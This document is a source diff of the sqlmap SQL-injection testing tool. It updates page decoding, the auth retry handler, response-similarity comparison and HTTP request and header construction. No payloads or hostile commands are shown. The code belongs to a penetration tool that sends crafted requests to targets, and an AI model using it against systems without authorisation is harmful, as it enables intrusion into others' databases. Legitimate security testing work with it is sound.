errMsg += "encoding '%s' ('%s')" % (contentEncoding, getSafeExString(ex))
|
||||||
singleTimeLogMessage(errMsg, logging.ERROR)
|
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||||
|
|
||||||
warnMsg = "turning off page compression"
|
warnMsg = "turning off page compression"
|
||||||
@@ -299,8 +302,7 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
|
|
||||||
metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))
|
metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))
|
||||||
|
|
||||||
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset))) or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
||||||
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
|
||||||
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
||||||
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
||||||
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
||||||
@@ -328,7 +330,7 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
|
|
||||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
|
|
||||||
if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig":
|
if (kb.pageEncoding or "").lower() == "utf-8-sig":
|
||||||
kb.pageEncoding = "utf-8"
|
kb.pageEncoding = "utf-8"
|
||||||
if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
|
if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
|
||||||
page = page[3:]
|
page = page[3:]
|
||||||
@@ -341,7 +343,7 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
try:
|
try:
|
||||||
retVal = unichr(int(match.group(1)))
|
retVal = unichr(int(match.group(1)))
|
||||||
except ValueError:
|
except (ValueError, OverflowError):
|
||||||
pass
|
pass
|
||||||
return retVal
|
return retVal
|
||||||
page = re.sub(r"&#(\d+);", _, page)
|
page = re.sub(r"&#(\d+);", _, page)
|
||||||
@@ -384,7 +386,7 @@ def processResponse(page, responseHeaders, status=None):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
conf.paramDict[PLACE.POST][name] = value
|
conf.paramDict[PLACE.POST][name] = value
|
||||||
conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
|
conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST])
|
||||||
|
|
||||||
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
||||||
kb.browserVerification = True
|
kb.browserVerification = True
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -30,10 +30,8 @@ class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
|
|||||||
self.retried_count = 0
|
self.retried_count = 0
|
||||||
else:
|
else:
|
||||||
if self.retried_count > 5:
|
if self.retried_count > 5:
|
||||||
raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed",
|
raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
|
||||||
headers, None)
|
|
||||||
else:
|
else:
|
||||||
self.retried_count += 1
|
self.retried_count += 1
|
||||||
|
|
||||||
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
|
return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)
|
||||||
self, auth_header, host, req, headers)
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -106,16 +106,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||||||
# Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
|
# Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
|
||||||
# (e.g. if one page is PDF and the other is HTML)
|
# (e.g. if one page is PDF and the other is HTML)
|
||||||
if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
|
if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
|
||||||
page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
|
page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
|
||||||
elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
|
elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
|
||||||
seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
|
seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
|
||||||
|
|
||||||
if seqMatcher.a and page and seqMatcher.a == page:
|
if any(_ is None for _ in (page, seqMatcher.a)):
|
||||||
ratio = 1
|
return None
|
||||||
|
elif seqMatcher.a and page and seqMatcher.a == page:
|
||||||
|
ratio = 1.
|
||||||
elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
|
elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
|
||||||
ratio = 1.0 * len(seqMatcher.a) / len(page)
|
if not page or not seqMatcher.a:
|
||||||
if ratio > 1:
|
return float(seqMatcher.a == page)
|
||||||
ratio = 1. / ratio
|
else:
|
||||||
|
ratio = 1. * len(seqMatcher.a) / len(page)
|
||||||
|
if ratio > 1:
|
||||||
|
ratio = 1. / ratio
|
||||||
else:
|
else:
|
||||||
seq1, seq2 = None, None
|
seq1, seq2 = None, None
|
||||||
|
|
||||||
@@ -132,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||||||
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
|
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
|
||||||
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
|
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
|
||||||
|
|
||||||
|
if kb.heavilyDynamic:
|
||||||
|
seq1 = seq1.split("\n")
|
||||||
|
seq2 = seq2.split("\n")
|
||||||
|
|
||||||
seqMatcher.set_seq1(seq1)
|
seqMatcher.set_seq1(seq1)
|
||||||
seqMatcher.set_seq2(seq2)
|
seqMatcher.set_seq2(seq2)
|
||||||
|
|
||||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)
|
||||||
|
|
||||||
# If the url is stable and we did not set yet the match ratio and the
|
# If the url is stable and we did not set yet the match ratio and the
|
||||||
# current injected value changes the url page content
|
# current injected value changes the url page content
|
||||||
|
|||||||
@@ -1,14 +1,13 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import binascii
|
import binascii
|
||||||
import compiler
|
import compiler
|
||||||
import httplib
|
import httplib
|
||||||
import json
|
|
||||||
import keyword
|
import keyword
|
||||||
import logging
|
import logging
|
||||||
import re
|
import re
|
||||||
@@ -17,6 +16,7 @@ import string
|
|||||||
import struct
|
import struct
|
||||||
import time
|
import time
|
||||||
import traceback
|
import traceback
|
||||||
|
import urllib
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
@@ -34,6 +34,7 @@ from lib.core.common import calculateDeltaSeconds
|
|||||||
from lib.core.common import checkSameHost
|
from lib.core.common import checkSameHost
|
||||||
from lib.core.common import clearConsoleLine
|
from lib.core.common import clearConsoleLine
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
|
from lib.core.common import escapeJsonValue
|
||||||
from lib.core.common import evaluateCode
|
from lib.core.common import evaluateCode
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import findMultipartPostBoundary
|
from lib.core.common import findMultipartPostBoundary
|
||||||
@@ -43,6 +44,7 @@ from lib.core.common import getHostHeader
|
|||||||
from lib.core.common import getRequestHeader
|
from lib.core.common import getRequestHeader
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import isMultiThreadMode
|
||||||
from lib.core.common import logHTTPTraffic
|
from lib.core.common import logHTTPTraffic
|
||||||
from lib.core.common import pushValue
|
from lib.core.common import pushValue
|
||||||
from lib.core.common import popValue
|
from lib.core.common import popValue
|
||||||
@@ -63,10 +65,13 @@ from lib.core.common import urlencode
|
|||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.datatype import AttribDict
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.dicts import POST_HINT_CONTENT_TYPES
|
from lib.core.dicts import POST_HINT_CONTENT_TYPES
|
||||||
from lib.core.enums import ADJUST_TIME_DELAY
|
from lib.core.enums import ADJUST_TIME_DELAY
|
||||||
from lib.core.enums import AUTH_TYPE
|
from lib.core.enums import AUTH_TYPE
|
||||||
from lib.core.enums import CUSTOM_LOGGING
|
from lib.core.enums import CUSTOM_LOGGING
|
||||||
|
from lib.core.enums import HINT
|
||||||
from lib.core.enums import HTTP_HEADER
|
from lib.core.enums import HTTP_HEADER
|
||||||
from lib.core.enums import HTTPMETHOD
|
from lib.core.enums import HTTPMETHOD
|
||||||
from lib.core.enums import NULLCONNECTION
|
from lib.core.enums import NULLCONNECTION
|
||||||
@@ -74,7 +79,7 @@ from lib.core.enums import PAYLOAD
|
|||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
from lib.core.enums import REDIRECTION
|
from lib.core.enums import REDIRECTION
|
||||||
from lib.core.enums import WEB_API
|
from lib.core.enums import WEB_PLATFORM
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
@@ -86,6 +91,7 @@ from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
|||||||
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import DEFAULT_USER_AGENT
|
||||||
from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
|
from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
|
||||||
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
||||||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||||
@@ -96,6 +102,8 @@ from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS
|
|||||||
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
|
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
|
||||||
from lib.core.settings import META_REFRESH_REGEX
|
from lib.core.settings import META_REFRESH_REGEX
|
||||||
from lib.core.settings import MIN_TIME_RESPONSES
|
from lib.core.settings import MIN_TIME_RESPONSES
|
||||||
|
from lib.core.settings import MAX_TIME_RESPONSES
|
||||||
|
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
|
from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
@@ -118,7 +126,6 @@ from lib.request.methodrequest import MethodRequest
|
|||||||
from thirdparty.odict.odict import OrderedDict
|
from thirdparty.odict.odict import OrderedDict
|
||||||
from thirdparty.socks.socks import ProxyError
|
from thirdparty.socks.socks import ProxyError
|
||||||
|
|
||||||
|
|
||||||
class Connect(object):
|
class Connect(object):
|
||||||
"""
|
"""
|
||||||
This class defines methods used to perform HTTP requests
|
This class defines methods used to perform HTTP requests
|
||||||
@@ -168,9 +175,11 @@ class Connect(object):
|
|||||||
warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')"
|
warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')"
|
||||||
else:
|
else:
|
||||||
warnMsg = "if the problem persists please check that the provided "
|
warnMsg = "if the problem persists please check that the provided "
|
||||||
warnMsg += "target URL is valid. In case that it is, you can try to rerun "
|
warnMsg += "target URL is reachable. In case that it is, "
|
||||||
warnMsg += "with the switch '--random-agent' turned on "
|
warnMsg += "you can try to rerun with "
|
||||||
warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
|
if not conf.randomAgent:
|
||||||
|
warnMsg += "switch '--random-agent' and/or "
|
||||||
|
warnMsg += "proxy switches ('--ignore-proxy', '--proxy',...)"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
elif conf.threads > 1:
|
elif conf.threads > 1:
|
||||||
@@ -187,13 +196,13 @@ class Connect(object):
|
|||||||
|
|
||||||
if not kb.dnsMode and conn:
|
if not kb.dnsMode and conn:
|
||||||
headers = conn.info()
|
headers = conn.info()
|
||||||
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||||
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
|
||||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||||
warnMsg = "large compressed response detected. Disabling compression"
|
warnMsg = "large compressed response detected. Disabling compression"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
|
raise SqlmapCompressionException
|
||||||
else:
|
else:
|
||||||
while True:
|
while True:
|
||||||
if not conn:
|
if not conn:
|
||||||
@@ -241,27 +250,28 @@ class Connect(object):
|
|||||||
kb.requestCounter += 1
|
kb.requestCounter += 1
|
||||||
threadData.lastRequestUID = kb.requestCounter
|
threadData.lastRequestUID = kb.requestCounter
|
||||||
|
|
||||||
url = kwargs.get("url", None) or conf.url
|
url = kwargs.get("url", None) or conf.url
|
||||||
get = kwargs.get("get", None)
|
get = kwargs.get("get", None)
|
||||||
post = kwargs.get("post", None)
|
post = kwargs.get("post", None)
|
||||||
method = kwargs.get("method", None)
|
method = kwargs.get("method", None)
|
||||||
cookie = kwargs.get("cookie", None)
|
cookie = kwargs.get("cookie", None)
|
||||||
ua = kwargs.get("ua", None) or conf.agent
|
ua = kwargs.get("ua", None) or conf.agent
|
||||||
referer = kwargs.get("referer", None) or conf.referer
|
referer = kwargs.get("referer", None) or conf.referer
|
||||||
host = kwargs.get("host", None) or conf.host
|
host = kwargs.get("host", None) or conf.host
|
||||||
direct_ = kwargs.get("direct", False)
|
direct_ = kwargs.get("direct", False)
|
||||||
multipart = kwargs.get("multipart", None)
|
multipart = kwargs.get("multipart", None)
|
||||||
silent = kwargs.get("silent", False)
|
silent = kwargs.get("silent", False)
|
||||||
raise404 = kwargs.get("raise404", True)
|
raise404 = kwargs.get("raise404", True)
|
||||||
timeout = kwargs.get("timeout", None) or conf.timeout
|
timeout = kwargs.get("timeout", None) or conf.timeout
|
||||||
auxHeaders = kwargs.get("auxHeaders", None)
|
auxHeaders = kwargs.get("auxHeaders", None)
|
||||||
response = kwargs.get("response", False)
|
response = kwargs.get("response", False)
|
||||||
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
|
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
|
||||||
refreshing = kwargs.get("refreshing", False)
|
refreshing = kwargs.get("refreshing", False)
|
||||||
retrying = kwargs.get("retrying", False)
|
retrying = kwargs.get("retrying", False)
|
||||||
crawling = kwargs.get("crawling", False)
|
crawling = kwargs.get("crawling", False)
|
||||||
checking = kwargs.get("checking", False)
|
checking = kwargs.get("checking", False)
|
||||||
skipRead = kwargs.get("skipRead", False)
|
skipRead = kwargs.get("skipRead", False)
|
||||||
|
finalCode = kwargs.get("finalCode", False)
|
||||||
|
|
||||||
if multipart:
|
if multipart:
|
||||||
post = multipart
|
post = multipart
|
||||||
@@ -346,7 +356,7 @@ class Connect(object):
|
|||||||
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
|
||||||
|
|
||||||
# Prepare HTTP headers
|
# Prepare HTTP headers
|
||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
|
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})
|
||||||
|
|
||||||
if HTTP_HEADER.COOKIE in headers:
|
if HTTP_HEADER.COOKIE in headers:
|
||||||
cookie = headers[HTTP_HEADER.COOKIE]
|
cookie = headers[HTTP_HEADER.COOKIE]
|
||||||
@@ -357,14 +367,21 @@ class Connect(object):
|
|||||||
if kb.proxyAuthHeader:
|
if kb.proxyAuthHeader:
|
||||||
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
||||||
|
|
||||||
if not getHeader(headers, HTTP_HEADER.ACCEPT):
|
if not conf.requestFile or not target:
|
||||||
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
if not getHeader(headers, HTTP_HEADER.HOST):
|
||||||
|
headers[HTTP_HEADER.HOST] = getHostHeader(url)
|
||||||
|
|
||||||
if not getHeader(headers, HTTP_HEADER.HOST) or not target:
|
if not getHeader(headers, HTTP_HEADER.ACCEPT):
|
||||||
headers[HTTP_HEADER.HOST] = getHostHeader(url)
|
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
||||||
|
|
||||||
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
|
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
|
||||||
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
||||||
|
|
||||||
|
elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT:
|
||||||
|
for header in headers:
|
||||||
|
if header.upper() == HTTP_HEADER.USER_AGENT.upper():
|
||||||
|
del headers[header]
|
||||||
|
break
|
||||||
|
|
||||||
if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
||||||
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
||||||
@@ -381,10 +398,6 @@ class Connect(object):
|
|||||||
if conf.keepAlive:
|
if conf.keepAlive:
|
||||||
headers[HTTP_HEADER.CONNECTION] = "keep-alive"
|
headers[HTTP_HEADER.CONNECTION] = "keep-alive"
|
||||||
|
|
||||||
# Reset header values to original in case of provided request file
|
|
||||||
if target and conf.requestFile:
|
|
||||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})
|
|
||||||
|
|
||||||
if auxHeaders:
|
if auxHeaders:
|
||||||
headers = forgeHeaders(auxHeaders, headers)
|
headers = forgeHeaders(auxHeaders, headers)
|
||||||
|
|
||||||
@@ -407,8 +420,10 @@ class Connect(object):
|
|||||||
ws.close()
|
ws.close()
|
||||||
code = ws.status
|
code = ws.status
|
||||||
status = httplib.responses[code]
|
status = httplib.responses[code]
|
||||||
|
|
||||||
class _(dict):
|
class _(dict):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
responseHeaders = _(ws.getheaders())
|
responseHeaders = _(ws.getheaders())
|
||||||
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||||
|
|
||||||
@@ -428,8 +443,10 @@ class Connect(object):
|
|||||||
method = unicodeencode(method)
|
method = unicodeencode(method)
|
||||||
req = MethodRequest(url, post, headers)
|
req = MethodRequest(url, post, headers)
|
||||||
req.set_method(method)
|
req.set_method(method)
|
||||||
else:
|
elif url is not None:
|
||||||
req = urllib2.Request(url, post, headers)
|
req = urllib2.Request(url, post, headers)
|
||||||
|
else:
|
||||||
|
return None, None, None
|
||||||
|
|
||||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||||
|
|
||||||
@@ -479,23 +496,23 @@ class Connect(object):
|
|||||||
|
|
||||||
# Get HTTP response
|
# Get HTTP response
|
||||||
if hasattr(conn, "redurl"):
|
if hasattr(conn, "redurl"):
|
||||||
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
|
||||||
else Connect._connReadProxy(conn)) if not skipRead else None
|
|
||||||
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
||||||
code = conn.redcode
|
code = conn.redcode if not finalCode else code
|
||||||
else:
|
else:
|
||||||
page = Connect._connReadProxy(conn) if not skipRead else None
|
page = Connect._connReadProxy(conn) if not skipRead else None
|
||||||
|
|
||||||
if conn:
|
if conn:
|
||||||
code = conn.code
|
code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes)
|
||||||
responseHeaders = conn.info()
|
responseHeaders = conn.info()
|
||||||
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
||||||
|
kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)
|
||||||
else:
|
else:
|
||||||
code = None
|
code = None
|
||||||
responseHeaders = {}
|
responseHeaders = {}
|
||||||
|
|
||||||
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
||||||
status = getUnicode(conn.msg) if conn else None
|
status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None
|
||||||
|
|
||||||
kb.connErrorCounter = 0
|
kb.connErrorCounter = 0
|
||||||
|
|
||||||
@@ -540,11 +557,11 @@ class Connect(object):
|
|||||||
if hasattr(conn.fp, '_sock'):
|
if hasattr(conn.fp, '_sock'):
|
||||||
conn.fp._sock.close()
|
conn.fp._sock.close()
|
||||||
conn.close()
|
conn.close()
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
except SqlmapConnectionException, ex:
|
except SqlmapConnectionException as ex:
|
||||||
if conf.proxyList and not kb.threadException:
|
if conf.proxyList and not kb.threadException:
|
||||||
warnMsg = "unable to connect to the target URL ('%s')" % ex
|
warnMsg = "unable to connect to the target URL ('%s')" % ex
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
@@ -553,7 +570,7 @@ class Connect(object):
|
|||||||
else:
|
else:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except urllib2.HTTPError, ex:
|
except urllib2.HTTPError as ex:
|
||||||
page = None
|
page = None
|
||||||
responseHeaders = None
|
responseHeaders = None
|
||||||
|
|
||||||
@@ -578,13 +595,13 @@ class Connect(object):
|
|||||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||||
|
|
||||||
code = ex.code
|
code = ex.code
|
||||||
status = getUnicode(ex.msg)
|
status = getSafeExString(ex)
|
||||||
|
|
||||||
kb.originalCode = kb.originalCode or code
|
kb.originalCode = kb.originalCode or code
|
||||||
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
||||||
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
||||||
|
|
||||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
|
responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||||
|
|
||||||
if responseHeaders:
|
if responseHeaders:
|
||||||
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||||
@@ -642,15 +659,8 @@ class Connect(object):
|
|||||||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||||
warnMsg = "connection was forcibly closed by the target URL"
|
warnMsg = "connection was forcibly closed by the target URL"
|
||||||
elif "timed out" in tbMsg:
|
elif "timed out" in tbMsg:
|
||||||
if not conf.disablePrecon:
|
|
||||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
|
||||||
conf.disablePrecon = True
|
|
||||||
|
|
||||||
if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
